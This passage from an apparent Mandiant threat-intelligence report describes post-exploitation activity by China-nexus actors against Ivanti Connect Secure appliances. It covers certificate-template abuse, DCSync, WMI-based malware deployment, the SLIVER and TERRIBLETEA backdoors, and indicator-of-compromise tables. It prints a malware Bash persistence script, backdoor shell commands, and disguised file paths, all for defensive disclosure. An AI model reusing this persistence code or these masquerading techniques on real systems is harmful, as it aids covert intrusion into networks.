style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/list-dir</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Lists directory contents</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/rename</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Renames a file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/put-file</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">File upload given a destination path, can optionally append to file</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/get-file</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">File download</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/slice-up</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">May upload large files in separate chunks</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/file-md5</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Calculates file MD5</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/up</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Uploads a file using a web form (includes SHA256 hashing)</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/api/file/stat</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Gets file information</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 2: BRICKSTORM endpoints</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Lateral Movement Leading to Active Directory Compromise</span></h3> <p><span style="vertical-align: baseline;">UNC5330 gained initial access to the victim environment by chaining together CVE-2024-21893 and CVE-2024-21887, a tactic outlined in </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence"><span style="text-decoration: underline; vertical-align: baseline;">Cutting Edge Part 3</span></a><span style="vertical-align: baseline;">. Shortly after gaining access, UNC5330 leveraged an LDAP bind account configured on the compromised Ivanti Connect Secure appliance to abuse a vulnerable Windows Certificate Template, created a computer object, and requested a certificate for a domain administrator. The threat actor then impersonated the domain administrator to perform subsequent DCSyncs to extract additional credential material to move laterally.</span></p> <h4><span style="vertical-align: baseline;">Attack Path Diagram</span></h4></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/cutting-edge4-fig4.max-1000x1000.png" alt="UNC5330 attack path diagram"> </a> <figcaption class="article-image__caption "><p data-block-key="mx14r">Figure 4: UNC5330 attack path diagram</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Windows Certificate Template Abuse </span></h4> <p><span style="vertical-align: baseline;">UNC5330 used the </span><code style="vertical-align: baseline;">ldap-ivanti</code><span style="vertical-align: baseline;"> account, configured on the Ivanti appliance for LDAP bind operations, to create a domain computer object, </span><code style="vertical-align: baseline;">testComputer$</code><span style="vertical-align: baseline;">. UNC5330 used the newly created </span><code style="vertical-align: baseline;">testComputer$</code><span style="vertical-align: baseline;"> computer object to request a certificate from a vulnerable certificate template that provided enrollment rights to </span><code style="vertical-align: baseline;">Domain Computers</code><span style="vertical-align: baseline;">. UNC5330 requested a certificate for a domain administrator account, obtained a Kerberos TGT using the certificate, and performed DCSync attacks to obtain additional domain credentials for enabling lateral movement.</span></p> <p><span style="vertical-align: baseline;">Once domain admin access was achieved, UNC5330 leveraged WMI to deploy the TONERJAM launcher and the PHANTOMNET backdoor.</span></p> <h4><span style="vertical-align: baseline;">WMI Event Consumers</span></h4> <p><span style="vertical-align: baseline;">WMI was used to perform lateral movement and establish persistence within the victim environment, primarily by creating and executing scheduled tasks that were subsequently removed. The ActiveScript event consumers performed the following:</span></p> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Created and registered a scheduled task with trigger type 7 (started the task upon registration) to execute command with </span><code style="vertical-align: baseline;">cmd.exe</code><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Wrote command output to a </span><code style="vertical-align: baseline;">.log</code><span style="vertical-align: baseline;"> file in </span><code style="vertical-align: baseline;">C:\Windows\Temp</code><span style="vertical-align: baseline;">.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deleted the scheduled task.</span></p> </li> </ol> <p><span style="vertical-align: baseline;">The behavior, as well as the naming convention used for both the WMI artifacts and output files, is consistent with a recent version of CrackMapExec that implements DCE/RPC for WMI execution that does not rely on SMB. Mandiant observed this technique being used to deploy TONERJAM and PHANTOMNET.</span></p> <h4><span style="vertical-align: baseline;">TONERJAM</span></h4> <p><span style="vertical-align: baseline;">TONERJAM is a launcher that decrypts and executes a shellcode payload, in this case PHANTOMNET, stored as an encrypted local file and decrypts it using an AES key derived from a SHA hash of the final 16 bytes of the encrypted payload. TONERJAM maintains persistence via the Run registry key or by hijacking COM objects depending on the permissions granted to it upon execution.</span></p> <h4><span style="vertical-align: baseline;">PHANTOMNET</span></h4> <p><span style="vertical-align: baseline;">PHANTOMNET is a modular backdoor that communicates using a custom communication protocol over TCP. PHANTOMNET's core functionality involves expanding its capabilities through a plugin management system. The downloaded plugins are mapped directly into memory and executed.</span></p> <h3><span style="vertical-align: baseline;">SLIVER C2</span></h3> <p><span style="vertical-align: baseline;">During a separate intrusion, UNC5266 retrieved copies of SLIVER from a Python SimpleHTTP server hosted on the same IP address as the configured command-and-control server. The copies of SLIVER were placed in three separate locations on the compromised appliance, attempting to masquerade as legitimate system files. UNC5266 modified a </span><code style="vertical-align: baseline;">systemd</code><span style="vertical-align: baseline;"> service file to register one of the copies of SLIVER as a persistent daemon.<br/><br/></span></p> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Path</strong></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/home/bin/netmon</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/home/bin/logd</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/home/runtime/logd</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">/home/config/logd.spec.cfg</code></p> </td> <td style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">systemd</code><span style="vertical-align: baseline;"> service unit configuration file</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: SLIVER components</span></p> <p><span style="vertical-align: baseline;">Additionally, UNC5266 leveraged a WARPWIRE variant previously reported in </span><a href="https://www.mandiant.com/resources/blog/investigating-ivanti-zero-day-exploitation" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Cutting Edge, Part 2</span></a><span style="vertical-align: baseline;">. This variant was downloaded by UNC5266 from what Mandiant believes to be a compromised web server located in Rwanda. See Figure 18 in the Cutting Edge Part 2 blog for details on the WARPWIRE variant.</span></p> <h3><span style="vertical-align: baseline;">TERRIBLETEA</span></h3> <p><span style="vertical-align: baseline;">At a separate intrusion, UNC5266 used the same WARPWIRE sample as used in their SLIVER operation. However, instead of SLIVER, UNC5266 deployed a Go backdoor that Mandiant has named TERRIBLETEA. During this intrusion, the actor attempted to use </span><code style="vertical-align: baseline;">curl</code><span style="vertical-align: baseline;"> to download the backdoor; however, logs suggest these attempts failed. Seven minutes after their last failed </span><code style="vertical-align: baseline;">curl</code><span style="vertical-align: baseline;"> attempt, UNC5266 ran a </span><code style="vertical-align: baseline;">wget</code><span style="vertical-align: baseline;"> request to an anonymous file sharing site:</span><code style="vertical-align: baseline;"> pan.xj.hk</code><span style="vertical-align: baseline;">. UNC5266 likely uploaded TERRIBLETEA to the file-sharing site in the intervening seven minutes.</span></p> <p><span style="vertical-align: baseline;">TERRIBLETEA is a Go backdoor that communicates over HTTP using XXTEA for encrypted communications. It is built using multiple open-source Go modules and has a multitude of capabilities including:</span></p> <ul> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Command execution</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Keystroke logging</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SOCKS5 proxy</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Port scanning</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">File system interaction</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">SQL query execution</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Screen captures</span></p> </li> <li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Ability to open a new SSH session, execute commands, and upload files to a remote server. The following commands may be executed:</span></p> </li> <ul> <li aria-level="2" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">chmod +x /tmp/.udevd</code></p> </li> <li aria-level="2" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">/tmp/.udevd <args></code></p> </li> <li aria-level="2" style="list-style-type: disc; vertical-align: baseline;"> <p role="presentation"><code style="vertical-align: baseline;">ls -lahrt /home/</code></p> </li> </ul> </ul> <p><span style="vertical-align: baseline;"><span style="vertical-align: baseline;">TERRIBLETEA can take different execution paths depending on what environment it is configured for, either </span><code style="vertical-align: baseline;">linux_amd64</code><span style="vertical-align: baseline;"> or </span><code style="vertical-align: baseline;">darwin_amd64</code><span style="vertical-align: baseline;">. In this instance, TERRIBLETEA is configured for the </span><code style="vertical-align: baseline;">linux_amd64</code><span style="vertical-align: baseline;"> environment. The sample persists with a Bash profile script located at </span><code style="vertical-align: baseline;">/etc/profile.d/cron.sh</code><span style="vertical-align: baseline;"> for persistence.</span></span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code># Initialization script for bash and sh # export AFS if you are in AFS environment a=`ps -fe|grep /bin/cron |grep -v grep|wc|awk '{print$1}'` if [ "$a" -eq 0 ] then /bin/cron fi</code></pre> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"><span style="vertical-align: baseline;">Figure 5: TERRIBLETEA Bash profile script</span></span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Outlook and Implications</span></h2> <p><span style="vertical-align: baseline;">The activity detailed in this blog, as well as the recently published </span><a href="https://cloud.google.com/blog/topics/threat-intelligence/investigating-ivanti-exploitation-persistence"><span style="text-decoration: underline; vertical-align: baseline;">Cutting Edge, Part 3</span></a><span style="vertical-align: baseline;"> highlighting UNC5325 targeting of Ivanti Connect Secure appliances, underscore the threat faced by edge appliances. Mandiant continues to observe China-nexus threat actors aggressively utilizing zero-day and N-day vulnerabilities to enable their operations and target organizations across the globe. </span></p> <p><span style="vertical-align: baseline;">Mandiant continues to observe a wide range of TTPs following the successful exploitation of vulnerabilities against edge appliances. As previously </span><span style="vertical-align: baseline;">reported</span><span style="vertical-align: baseline;"> by Mandiant, <a href="https://cloud.google.com/blog/topics/threat-intelligence/chinese-espionage-tactics">China-nexus actors continue to evolve their stealth to avoid detection by defenders</a>. While the use of open--source tooling is somewhat common, Mandiant continues to observe actors leveraging custom malware that is tailored to the appliance or environment the actor is targeting.</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <h3><span style="vertical-align: baseline;">Host-Based Indicators (HBIs)</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Filename</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">MD5</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">data.dat</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">9d684815bc96508b99e6302e253bc292</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PHANTOMNET</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">epdevmgr.dll</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">b210a9a9f3587894e5a0f225b3a6519f</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TONERJAM</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">libdsproxy.so</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4f79c70cce4207d0ad57a339a9c7f43c</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SPAWNMOLE</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">libdsmeeting.so</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">e7d24813535f74187db31d4114f607a1</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SPAWNSNAIL</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">.liblogblock.so</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4acfc5df7f24c2354384f7449280d9e0 </span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SPAWNSLOTH</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">.dskey</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">3ef30bc3a7e4f5251d8c6e1d3825612d</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SPAWNSNAIL private key</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">bb3b286f88728060c80ea65993576ef8</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TERRIBLETEA</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">cfca610934b271c26437c4ce891bad00</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TERRIBLETEA</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">08a817e0ae51a7b4a44bc6717143f9c2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">TERRIBLETEA</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">linb64.png</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">e7fdbed34f99c05bb5861910ca4cc994</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">lint64.png</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">c251afe252744116219f885980f2caea</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">linb64.png</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4f68862d3170abd510acd5c500e43548</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">lint64.png</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">9d0b6276cbc4c8b63c269e1ddc145008</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">logd</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">71b4368ef2d91d49820c5b91f33179cb</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">winb64.png</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">d88bbed726d79124535e8f4d7de5592e</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">logd.spec.cfg</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">846369b3a3d4536008a6e1b92ed09549</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER persistence</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">N/A</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8e429d919e7585de33ea9d7bb29bc86b</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">SLIVER downloader</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">fc1a8f73010f401d6e95a42889f99028</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PHANTOMNET</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">e72efc0753e6386fbca0a500836a566e</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">PHANTOMNET</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">N/A</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4645f2f6800bc654d5fa812237896b00</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">BRICKSTORM</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 4: Host-based indicators</span></p> <h3><span style="vertical-align: baseline;">Network-Based Indicators (NBIs)</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/><col/></colgroup> <thead> <tr> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Network Indicator</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Type</strong></p> </th> <th scope="col" style="vertical-align: top; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </th> </tr> </thead> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">8.218.240[.]85</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">98.142.138[.]21</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">103.13.28[.]40</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">103.27.110[.]83</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">103.73.66[.]37</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">193.149.129[.]191</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">206.188.196[.]199</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">IPv4</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Post-exploitation activity</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">oast[.]fun</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Pre-exploitation validation</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><code style="vertical-align: baseline;">cpanel.netbar[.]org</code></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Domain</span></p> </td> <td 